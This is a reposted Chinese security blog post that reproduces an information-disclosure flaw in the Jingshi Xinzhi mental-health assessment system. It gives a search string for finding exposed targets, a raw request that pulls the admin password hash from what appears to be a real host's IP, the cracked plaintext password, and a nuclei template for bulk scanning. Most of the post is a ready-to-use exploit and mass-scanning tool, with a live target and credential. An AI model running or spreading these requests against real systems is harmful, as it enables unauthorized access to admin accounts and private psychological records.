京师心智心理健康测评系统 MyReport.ashx 信息泄露漏洞复现

admin 2024年4月25日17:02:21评论6 views字数 1435阅读4分47秒阅读模式

京师心智心理健康测评系统 MyReport.ashx 信息泄露漏洞复现

京师心智心理健康测评系统 MyReport.ashx 信息泄露漏洞复现

CAMPING

漏洞简介

京师心智心理健康测评系统 MyReport.ashx 信息泄露漏洞复现

        京师心智心理健康测评系统由心理学专家指导研发,使用先进的测试方法,通过一系列的数据处理将人的心理特征数量化,以此来衡量个体心理因素水平以及心理差异,帮助开展标准化心理健康工作。京师心智心理健康测评系统 MyReport.ashx接口存在信息泄露漏洞,未经身份验证的攻击者可以利用此漏洞获取系统后台管理员账户密码凭证,并且解密后可登录后台页面,使系统处于极不安全的状态。

京师心智心理健康测评系统 MyReport.ashx 信息泄露漏洞复现

CAMPING

漏洞复现

京师心智心理健康测评系统 MyReport.ashx 信息泄露漏洞复现

步骤一:使用以下搜索语法获取测试资产并确定测试目标~~~

# 搜索语法body="JS/ligerComboBox/ligerTree.js"

步骤二:使用以下数据包获取目标网站的用户与密码信息.....可获取密码的加密值信息!!!

GET /FunctionModular/PersonalReport/Ajax/MyReport.ashx?type=3&loginName=admin HTTP/1.1Host: 39.96.184.238:8077User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Connection: close

京师心智心理健康测评系统 MyReport.ashx 信息泄露漏洞复现

步骤三:在解密网站上进行解密获取明文密码...并在登录界面中进行登陆...

# 解密网站https://cmd5.com/# 明文密码3963ADCBF3248BF75329871CAF462DB8   mentor1
京师心智心理健康测评系统 MyReport.ashx 信息泄露漏洞复现

CAMPING

批量脚本

京师心智心理健康测评系统 MyReport.ashx 信息泄露漏洞复现
id: XLinfoinfo:  name: XLinfo  author: Administrator  severity: info  description: description  reference:    - https://  tags: tagshttp:  - raw:      - |+        GET /FunctionModular/PersonalReport/Ajax/MyReport.ashx?type=3&loginName=admin HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2        Accept-Encoding: gzip, deflate        Connection: close        If-Modified-Since: Thu, 29 Sep 2022 03:18:46 GMT        If-None-Match: "4b76aa2fb2d3d81:0"    matchers-condition: and    matchers:      - type: word        part: body        words:          - admin      - type: status        status:          - 200

    

原文始发于微信公众号(揽月安全团队):京师心智心理健康测评系统 MyReport.ashx 信息泄露漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月25日17:02:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   京师心智心理健康测评系统 MyReport.ashx 信息泄露漏洞复现http://cn-sec.com/archives/2688214.html

发表评论

匿名网友 填写信息